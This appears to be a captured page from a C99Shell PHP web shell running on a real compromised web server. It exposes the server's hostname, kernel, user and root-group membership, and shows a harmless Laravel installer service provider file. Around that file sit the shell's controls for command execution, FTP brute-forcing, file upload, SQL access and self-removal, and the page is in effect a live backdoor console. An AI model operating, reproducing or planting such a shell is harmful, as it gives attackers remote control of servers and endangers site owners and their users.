!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/ecom1.picotech.app/public_html_ecom1/packages/infoamin/laravel-installer/src/   drwxr-xr-x
Free 26.13 GB of 117.98 GB (22.15%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     LaravelInstallerServiceProvider.php (1.17 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

namespace Infoamin\Installer;

use 
Illuminate\Support\ServiceProvider;
use 
Illuminate\Foundation\AliasLoader;
use 
Illuminate\Routing\Router;
use 
Infoamin\Installer\Http\Middleware\CheckInstalled;


class 
LaravelInstallerServiceProvider extends ServiceProvider
{
    
/**
     * Indicates if loading of the provider is deferred.
     *
     * @var bool
     */
    
protected $defer false;

    
/**
     * Register the service provider.
     *
     * @return void
     */
    
public function register() {
        
$this->app->bind(
            
'Infoamin\Installer\Interfaces\PurchaseInterface',
            
'Infoamin\Installer\Helpers\PurchaseChecker'
        
);

        
$this->app->bind(
            
'Infoamin\Installer\Interfaces\CurlRequestInterface',
            
'Infoamin\Installer\Http\Requests\CurlRequest'
        
);
    }

    
/**
     * Bootstrap the application events.
     *
     * @return void
     */
    
public function boot()
    {
        
$router $this->app->make(Router::class);
        
$router->aliasMiddleware('installed'CheckInstalled::class);
        
// Routes
        
require __DIR__.'/Http/routes/web.php';
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0034 ]--